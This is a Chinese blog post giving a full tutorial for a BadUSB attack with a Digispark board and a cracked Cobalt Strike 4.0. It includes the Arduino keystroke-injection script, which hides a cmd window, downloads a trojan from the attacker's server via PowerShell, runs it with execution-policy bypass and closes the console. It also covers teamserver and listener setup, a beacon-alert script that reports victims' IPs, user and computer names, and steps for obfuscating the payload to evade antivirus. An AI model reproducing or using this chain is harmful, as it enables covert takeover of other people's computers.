<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":{"home":"/","about":"/about","tags":"/tags","resources":"/resources","categories":"/categories","schedule":"/schedule"}},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="BadUsb配合CobaltStrike4.0上线0，实验概述参考资料：https:&#x2F;&#x2F;blog.csdn.net&#x2F;m0_49605975&#x2F;article&#x2F;details&#x2F;109248406 硬件材料：淘宝购Digispark （Attiny85）开发板（橡皮鸭rubber ducky经典版） 虚拟环境：云服务器一台（搭建CS服务端，开放web服务供靶机下载木马），任意联网靶机（Win7、Win1">
<meta property="og:type" content="article">
<meta property="og:title" content="BadUsb配合CobaltStrike4.0上线">
<meta property="og:url" content="http://example.com/2021/09/06/BadUsb%E9%85%8D%E5%90%88CobaltStrike4.0%E4%B8%8A%E7%BA%BF/index.html">
<meta property="og:site_name" content="小乱的Blog">
<meta property="og:description" content="BadUsb配合CobaltStrike4.0上线0，实验概述参考资料：https:&#x2F;&#x2F;blog.csdn.net&#x2F;m0_49605975&#x2F;article&#x2F;details&#x2F;109248406 硬件材料：淘宝购Digispark （Attiny85）开发板（橡皮鸭rubber ducky经典版） 虚拟环境：云服务器一台（搭建CS服务端，开放web服务供靶机下载木马），任意联网靶机（Win7、Win1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909160756846.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909160855067.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161051520.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161138089.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161231818.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161314586.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161400740.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161506051.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161627879.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161729765.png">
<meta property="article:published_time" content="2021-09-06T08:26:47.000Z">
<meta property="article:modified_time" content="2022-07-16T14:52:36.210Z">
<meta property="article:author" content="xiaoluan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909160756846.png">

<link rel="canonical" href="http://example.com/2021/09/06/BadUsb%E9%85%8D%E5%90%88CobaltStrike4.0%E4%B8%8A%E7%BA%BF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BadUsb配合CobaltStrike4.0上线 | 小乱的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">小乱的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-resources">

    <a href="/resources/" rel="section"><i class="fa fa-download fa-fw"></i>资源</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/06/BadUsb%E9%85%8D%E5%90%88CobaltStrike4.0%E4%B8%8A%E7%BA%BF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="xiaoluan">
      <meta itemprop="description" content="健康 规律 技能">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小乱的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BadUsb配合CobaltStrike4.0上线
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-09-06 16:26:47" itemprop="dateCreated datePublished" datetime="2021-09-06T16:26:47+08:00">2021-09-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-07-16 22:52:36" itemprop="dateModified" datetime="2022-07-16T22:52:36+08:00">2022-07-16</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/source/categories/1-%E5%A4%96%E5%9B%B4%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">1.外围渗透</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/source/categories/1-%E5%A4%96%E5%9B%B4%E6%B8%97%E9%80%8F/1-%E8%BF%91%E6%BA%90%E6%94%BB%E5%87%BB/" itemprop="url" rel="index"><span itemprop="name">1.近源攻击</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="BadUsb配合CobaltStrike4-0上线"><a href="#BadUsb配合CobaltStrike4-0上线" class="headerlink" title="BadUsb配合CobaltStrike4.0上线"></a>BadUsb配合CobaltStrike4.0上线</h1><h2 id="0，实验概述"><a href="#0，实验概述" class="headerlink" title="0，实验概述"></a>0，实验概述</h2><p>参考资料：<a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_49605975/article/details/109248406">https://blog.csdn.net/m0_49605975/article/details/109248406</a></p>
<p>硬件材料：淘宝购Digispark （Attiny85）开发板（橡皮鸭rubber ducky经典版）</p>
<p>虚拟环境：云服务器一台（搭建CS服务端，开放web服务供靶机下载木马），任意联网靶机（Win7、Win10），Arduino编程软件，CobaltStrike4.0（后文简称CS4）破解版，Digispark（Attiny89）开发板驱动</p>
<p>思路总结：网购Digispark开发板，使用arduino烧录攻击代码，插入靶机模拟键盘操作打开Win+R，自动输入命令，最小化cmd，调用powershell远程下载云服务器上的木马并执行，关闭cmd窗口化进程，使其后台执行。</p>
<span id="more"></span>

<h2 id="1，CS4环境部署"><a href="#1，CS4环境部署" class="headerlink" title="1，CS4环境部署"></a>1，CS4环境部署</h2><h3 id="部署CS4服务端"><a href="#部署CS4服务端" class="headerlink" title="部署CS4服务端"></a>部署CS4服务端</h3><p>上传CS4到云服务器。</p>
<p>进入CS4目录，先给执行文件teamserver足够的权限：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod <span class="number">777</span> ./teamserver</span><br></pre></td></tr></table></figure>

<p>再设置参数来开启CS4服务。但由于需要服务一直在后台启动，所以使用screen命令。</p>
<p>screen下载（CentOS）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">yum install screen -y</span><br></pre></td></tr></table></figure>

<p>然后打开一个新的screen窗口，在里面运行CS4服务，命令如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">screen	-S cs4	<span class="comment">//打开新窗口，并命名为cs4</span></span><br><span class="line">cd CS4目录	<span class="comment">//在新窗口跳转到CS4所在目录</span></span><br><span class="line">./teamserver vps的ip地址 连接密码	<span class="comment">//开CS4服务</span></span><br><span class="line">Ctrl+a，松开，再按d。	<span class="comment">//切换回主界面。</span></span><br></pre></td></tr></table></figure>

<p>这样CS4服务就部署完了，即使会话关闭，这个服务也会再后台一直存在，除非用kill命令杀掉它。如果要重新进入这个会话：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">screen -R cs4</span><br><span class="line"><span class="built_in">exit</span>	<span class="comment">//这个会话会彻底注销。</span></span><br></pre></td></tr></table></figure>

<p>由于我部署在腾讯云服务器上，所以需要在云防护上给端口放行，云防护默认是开放所有出端口，开放部分入端口的。我们需要先开放CS服务端口50050，供客户端连接：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909160756846.png" alt="image-20210909160756846"></p>
<p>PS：这里我用的是轻量应用服务器，云服务器的云防护配置方法自行查找，教程网上到处都是，并不难找。</p>
<h3 id="部署CS4客户端"><a href="#部署CS4客户端" class="headerlink" title="部署CS4客户端"></a>部署CS4客户端</h3><p>打开CS4文件夹，双击start.bat，在登陆框中输入登陆信息：</p>
<p>主机写VPS的IP地址，端口默认50050，用户名随便输，密码是之前部署CS4服务端时输的密码，要对应，不然登不上：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909160855067.png" alt="image-20210909160855067"></p>
<p>然后创建一个监听器：菜单栏Cobalt Strike–&gt;监听器–&gt;Add：</p>
<p>名字随便起；HTTP Hosts右边点”+”号，一般默认就是你云服务器的地址，直接确定就好；HTTP Port（C2）设置一个你云服务器不用的端口，建议10000以上，不容易跟已有端口冲突，一旦冲突服务就起不来了；其他一切选项保持默认。</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161051520.png" alt="image-20210909161051520"></p>
<p>然后再在云防护上给这个端口放行，步骤和之前一样，这里我设置是4445，你们可以改成自定的（建议10000以上，端口冲突这个坑我是踩过的），总之保持CS4客户端监听器端口与云防护放行那个端口一致就可以了：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161138089.png" alt="image-20210909161138089"></p>
<p>接着生成一个powershell木马，一会儿要用：</p>
<p>菜单栏 攻击–&gt;生成后门–&gt;Payload Generator</p>
<p>弹框中监听器选择刚才设置那个；输出下拉选择Powershell，x64选不选取决于你目标的系统是不是64位系统。最后点Generate生成木马，选择一个存放地址就可以得到一个.ps1后缀的木马文件了。</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161231818.png" alt="image-20210909161231818"></p>
<p>做到这一步就可以使用该木马配合CS4进行攻击了，只需要在任意安装了powershell且无防护的机器上（win7、win10自带powershell）运行生成的木马，就可以看到CS4客户端目标机器的上线信息了，也即获得了目标机器的shell权限。</p>
<h3 id="将木马上传到云服务器备用"><a href="#将木马上传到云服务器备用" class="headerlink" title="将木马上传到云服务器备用"></a>将木马上传到云服务器备用</h3><p>在云服务器上安装httpd服务，并将木马上传到默认的网站根目录：&#x2F;var&#x2F;www&#x2F;html&#x2F;下，网页访问试试能不能下载到，之后会通过badusb的脚本来访问这个链接：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161314586.png" alt="image-20210909161314586"></p>
<p>由于badusb脚本遇到中文输入法会出错，所以我在脚本里添加了切换大小写的代码，会将输入法切换成大写，并循环执行脚本，这样总有一次能绕过输入法让靶机中招。所以对于木马，最好也复制两份，一份名字是大写，一份是小写，比如：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161400740.png" alt="image-20210909161400740"></p>
<p>PS：木马不使用P64.ps1后缀也是可以运行的，你通过网页访问木马很容易就能发现，木马最终下载下来是文本的格式，所以改成p64、P64等名字，也不会影响木马执行，反而由于取消了ps1后缀，更不易被杀软检测到。</p>
<p>PPS：httpd服务默认端口80在腾讯云上是默认放行的，但保险起见，各位还是登入云服务器检查一下。</p>
<h2 id="2，badusb烧录"><a href="#2，badusb烧录" class="headerlink" title="2，badusb烧录"></a>2，badusb烧录</h2><h3 id="安装软件"><a href="#安装软件" class="headerlink" title="安装软件"></a>安装软件</h3><p>烧录前需要准备两个软件：Arduino软件、Digispark （Attiny85）开发板驱动。</p>
<p>Arduino可以去官网免费下载：<a target="_blank" rel="noopener" href="https://www.arduino.cc/en/donate/">https://www.arduino.cc/en/donate/</a></p>
<p>驱动下载：<a target="_blank" rel="noopener" href="https://github.com/digistump/DigistumpArduino/blob/master/tools/micronucleus-2.0a4-win.zip">https://github.com/digistump/DigistumpArduino/blob/master/tools/micronucleus-2.0a4-win.zip</a></p>
<p>将驱动解压，选择文件夹中的DPinst.exe或DPinst64.exe双击运行，这取决于你自己的机器是32位还是64位：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161506051.png" alt="image-20210909161506051"></p>
<h3 id="烧录脚本"><a href="#烧录脚本" class="headerlink" title="烧录脚本"></a>烧录脚本</h3><p>打开arduino，就可以设计badusb插入后要执行的程序了，这块在学习中能了解到，是一块很庞大的知识，利用好了能产生无限可能。想想就相当于badusb插入靶机后，你就在靶机里获得了一个虚拟键盘和鼠标的权限，想开什么端口，反弹shell，或是关掉杀毒软件，防火墙等等，都可以通过编程实现。</p>
<p>但这次我的目的只是制作一个能配合CS4上线的badusb玩具，所以仅限于反弹shell方面的代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">#include &quot;DigiKeyboard.h&quot;</span><br><span class="line">#define KEY_ESC     41</span><br><span class="line">#define KEY_BACKSPACE 42</span><br><span class="line">#define KEY_TAB     43</span><br><span class="line">#define KEY_PRT_SCR 70</span><br><span class="line">#define KEY_DELETE  76</span><br><span class="line">#define KEY_CAPS_LOCK 0x39</span><br><span class="line"></span><br><span class="line">void setup() &#123;</span><br><span class="line">DigiKeyboard.delay(3000);</span><br><span class="line">DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //win+R</span><br><span class="line">DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);  //大小写转换绕过中文输入法</span><br><span class="line">DigiKeyboard.delay(500);</span><br><span class="line">DigiKeyboard.println(&quot;CMD /t:01 /k @ECHO OFF &amp;&amp; MODE CON:cols=15 lines=1&quot;);  //最小化cmd窗口</span><br><span class="line">DigiKeyboard.sendKeyStroke(KEY_ENTER);  //回车</span><br><span class="line">DigiKeyboard.delay(500);</span><br><span class="line">DigiKeyboard.println(&quot;mkdir C:\\test&quot;); //C盘创建一个test目录</span><br><span class="line">DigiKeyboard.delay(1000);  </span><br><span class="line">DigiKeyboard.println(&quot;powershell&quot;);  </span><br><span class="line">DigiKeyboard.println(&quot;$clnt = new-object system.net.webclient;&quot;);</span><br><span class="line">DigiKeyboard.println(&quot;$url= &#x27;http://xxx.xxx.xxx.xxx/p64&#x27;;&quot;);</span><br><span class="line">DigiKeyboard.println(&quot;$file = &#x27;c:\\test\\b.ps1&#x27;;&quot;);</span><br><span class="line">DigiKeyboard.println(&quot;$clnt.downloadfile($url,$file)&quot;);   //分段执行，绕过防火墙进程保护，从云端下载木马到本地C盘test目录，并命名为b.ps1</span><br><span class="line">DigiKeyboard.println(&quot;powershell.exe -executionpolicy bypass -file c:\\test\\b.ps1&quot;);   //本地权限绕过执行木马</span><br><span class="line">DigiKeyboard.sendKeyStroke(KEY_ENTER);</span><br><span class="line">DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //win+R</span><br><span class="line">DigiKeyboard.delay(500);</span><br><span class="line">DigiKeyboard.println(&quot;taskkill /t /im conhost.exe /f&quot;);  //关闭cmd的宿主程序，即图形界面</span><br><span class="line">&#125;</span><br><span class="line">void loop() &#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译没问题后，点击右箭头烧录，然后在60s内将U盘插入，等待提示烧录成功即可：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161627879.png" alt="image-20210909161627879"></p>
<p>以上步骤都完成之后，一个badusb配合CS4上线的攻击方式就完成了，只要将badusb插入任意未锁屏的机器，模拟按键的脚本就会在10s内运行，从云服务器下载木马并执行，将shell乖乖递给云端的CS4服务器。</p>
<h2 id="3，CS4微信上线提示"><a href="#3，CS4微信上线提示" class="headerlink" title="3，CS4微信上线提示"></a>3，CS4微信上线提示</h2><p>考虑到带USB的智能服务机这类测试对象，有可能出现即使上线，也依旧无任何回显的情况，所以做一个依据CS4服务端上线信息的微信提示。</p>
<p>参考资料：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/trevain/p/13693215.html">https://www.cnblogs.com/trevain/p/13693215.html</a></p>
<p>访问Server酱<a target="_blank" rel="noopener" href="https://sct.ftqq.com/">https://sct.ftqq.com/</a></p>
<p>直接用微信扫码关注公众号就可以登陆，然后Server酱就会给你生成一个SendKey，用这个东西配合以下脚本：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">循环获取所有beacon</span></span><br><span class="line">on beacon_initial &#123;</span><br><span class="line"></span><br><span class="line">    sub http_get &#123;</span><br><span class="line">        local(&#x27;$output&#x27;);</span><br><span class="line">        $url = [new java.net.URL: $1];</span><br><span class="line">        $stream = [$url openStream];</span><br><span class="line">        $handle = [SleepUtils getIOHandle: $stream, $null];</span><br><span class="line"></span><br><span class="line">        @content = readAll($handle);</span><br><span class="line"></span><br><span class="line">        foreach $line (@content) &#123;</span><br><span class="line">            $output .= $line . &quot;\r\n&quot;;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        println($output);</span><br><span class="line">    &#125;</span><br><span class="line">    #获取ip、计算机名、登录账号</span><br><span class="line">    $externalIP = replace(beacon_info($1, &quot;external&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $internalIP = replace(beacon_info($1, &quot;internal&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $userName = replace(beacon_info($1, &quot;user&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line">    $computerName = replace(beacon_info($1, &quot;computer&quot;), &quot; &quot;, &quot;_&quot;);</span><br><span class="line"></span><br><span class="line">    #get一下Server酱的链接</span><br><span class="line">    $url = &#x27;https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&amp;desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:&#x27;.$externalIP.&#x27;%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:&#x27;.$internalIP.&#x27;%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:&#x27;.$userName.&#x27;%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:&#x27;.$computerName;</span><br><span class="line"></span><br><span class="line">    http_get($url);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在以上代码填写好自己的SendKey之后，保存为weixinNotice.cna文件，上传到云服务器的CS4根目录，在CS4服务端开启的情况下（如果没开启自行开启后再下一步）使用下列命令，开启微信提醒脚本并在后台保持运行：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">screen -S cs4-notice</span><br><span class="line">./agscript xxx.xxx.xxx.xxx <span class="number">50050</span> 用户名 密码 weixinNotice.cna</span><br><span class="line">Ctrl+a，松开，再按d	<span class="comment">//会话后台运行</span></span><br></pre></td></tr></table></figure>

<p>然后在你shell上线后，就可以收到Server酱发给你的微信消息啦：</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/image-20210909161729765.png" alt="image-20210909161729765"></p>
<h2 id="4，木马免杀"><a href="#4，木马免杀" class="headerlink" title="4，木马免杀"></a>4，木马免杀</h2><p>免杀以火绒为主要对象。</p>
<p>说白了就是要模糊木马中的特征，这里用到一个工具：Invoke-Obfuscation-master。</p>
<p>下载地址：<a target="_blank" rel="noopener" href="https://github.com/danielbohannon/Invoke-Obfuscation">https://github.com/danielbohannon/Invoke-Obfuscation</a></p>
<p>使用该工具，对先前生成的木马进行免杀，具体步骤为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">1，关闭杀毒软件</span><br><span class="line">2，管理员权限打开Powershell</span><br><span class="line">2，Set-ExecutionPolicy Unrestricted -Scope CurrentUser		//修改Powershell配置，使其允许运行脚本。</span><br><span class="line">3,cd到Invoke-Obfuscation所在目录</span><br><span class="line">4，Import-Module ./Invoke-Obfuscation.psd1		//导入模块</span><br><span class="line">5，Invoke-Obfuscation		//运行工具</span><br><span class="line">6，set scriptpath 需免杀木马所在绝对路径		//设置需免杀木马所在位置</span><br><span class="line">7，encoding		//选择encoding模式进行免杀</span><br><span class="line">8，由1-8编号，在8种免杀方法种选择一种</span><br><span class="line">9，out 1.ps1		//输出免杀木马到指定目录......输出完后可以再输编号，用其他方法进行免杀，8种全试一遍，总有一种能免杀的，推荐从第8种往前试。</span><br><span class="line">10，exit		//退出工具</span><br><span class="line">11，Set-ExecutionPolicy RemoteSigned -Scope CurrentUser		//还原电脑配置，禁止脚本执行。</span><br></pre></td></tr></table></figure>

<p>使用各种杀毒软件，对免杀后的木马进行测试，将能通过的测试的木马，上传到服务器替换非免杀木马即可。</p>
<h2 id="5，最后总结"><a href="#5，最后总结" class="headerlink" title="5，最后总结"></a>5，最后总结</h2><p>360免杀还存在问题，Invoke-PSImage虽然能够免杀，但配合badusb使用成效时间要按分钟计，太慢了。而且代码量太大，超出了Digispark的可容纳范围，导致只能削减cmd窗口最小化功能。目前还不能实战。</p>
<p>还有另一种360免杀办法，学自B站UP：Yihsiwei_啊渣。但需要在内网，控一台windows主机，开net share。然后用copy的方法使文件落地，我现在暂时用不到（打不到内网，太菜了）。</p>
<p>综上，以后再补充吧。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/08/26/%E7%AC%AC%E4%B8%80%E7%AF%87%E5%8D%9A%E5%AE%A2/" rel="prev" title="第一篇博客">
      <i class="fa fa-chevron-left"></i> 第一篇博客
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/10/28/%E5%85%B6%E4%BB%96%E9%A2%98%E5%9E%8B/" rel="next" title="其他题型">
      其他题型 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
